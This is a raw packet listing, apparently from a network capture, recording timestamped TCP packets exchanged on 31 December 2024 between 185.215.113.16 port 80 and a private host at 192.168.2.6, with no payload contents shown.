Dec 31, 2024 09:48:41.603869915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603888988 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.603912115 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603924990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603935003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603945971 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.603954077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603961945 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.603964090 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603974104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.603988886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604000092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604006052 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604032040 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604059935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604075909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604087114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604089975 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604098082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604106903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604114056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604139090 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604192972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604202986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604219913 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604229927 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604244947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604245901 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604257107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604260921 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.604268074 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.604290009 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.608506918 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725156069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725193024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725225925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725239992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725258112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725291014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725297928 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725322962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725356102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725357056 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725800991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725852013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725872993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725941896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.725977898 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.725987911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726021051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726052046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726054907 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726083994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726116896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726119041 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726166010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726197004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726198912 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726229906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726260900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726274014 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726293087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726324081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726327896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726356983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726383924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726387978 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726433039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726464987 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726465940 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726496935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726528883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726536989 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726561069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726596117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726612091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726684093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726725101 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726738930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726772070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726804018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726807117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.726838112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.726870060 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727039099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727056026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727067947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727077961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727087975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727088928 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727097988 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727108955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727118969 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727149963 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727174044 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727196932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727207899 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727214098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727216005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727226019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727236032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727247000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727247953 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727257967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727277994 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727334976 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727791071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727802038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727812052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727823019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727823019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727833033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727843046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.727844954 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.727879047 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728007078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728034973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728045940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728056908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728070974 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728079081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728480101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728492022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728502989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728513956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728521109 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728547096 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728614092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728625059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728636026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728646040 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728651047 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728667974 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728729963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728740931 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728750944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728761911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728766918 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728773117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728784084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728800058 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728806973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728817940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728827953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728846073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728856087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728866100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728868008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728868008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728878021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728890896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728905916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728933096 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.728972912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728982925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.728992939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729003906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729008913 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729023933 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729031086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729058027 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729201078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729212046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729227066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729238033 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729243040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729254007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729264975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729290962 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729367018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729378939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729388952 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729399920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729406118 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729439974 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.729444027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729454041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729465008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.729480982 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.731595993 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851059914 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851099014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851135015 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851144075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851169109 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851202965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851207018 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851239920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851272106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851303101 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851306915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851346970 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851377964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851440907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851473093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851476908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851543903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851572990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851603031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851604939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851638079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851643085 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851694107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851731062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851742983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851793051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851825953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851830959 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851854086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851891041 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.851922989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.851954937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852001905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852003098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852051020 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852078915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852086067 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852111101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852145910 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852145910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852174997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852205992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852231979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852237940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852272034 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852284908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852317095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852349043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852355003 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852380991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852413893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852420092 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852462053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852503061 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852509975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852557898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852588892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852602005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852621078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852652073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852668047 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852686882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852718115 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852736950 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852750063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852782011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852790117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852814913 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852845907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852849007 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852879047 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852905989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852912903 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.852956057 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852987051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.852992058 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853018999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853051901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853059053 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853084087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853116035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853123903 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853147984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853180885 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853185892 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853208065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853241920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853255987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853274107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853305101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853311062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.853338003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853368998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.853375912 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854401112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854449987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854473114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854505062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854542971 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854554892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854603052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854643106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854651928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854686022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854720116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854724884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854768991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854805946 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854815960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854849100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854890108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854895115 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854945898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.854979992 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.854995012 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855046034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855079889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855086088 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855108976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855140924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855146885 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855218887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855261087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855304003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855369091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855405092 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855412006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855444908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855477095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855484962 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855508089 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855540037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855547905 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855568886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855600119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855606079 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855632067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855663061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855669022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855696917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855725050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855742931 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855756044 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855787992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855793953 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855819941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855853081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855860949 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855885029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855916977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855921030 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.855950117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855982065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.855988026 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.856009960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856040955 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856048107 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.856071949 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856103897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856105089 CET	49754	80	192.168.2.6	185.215.113.16
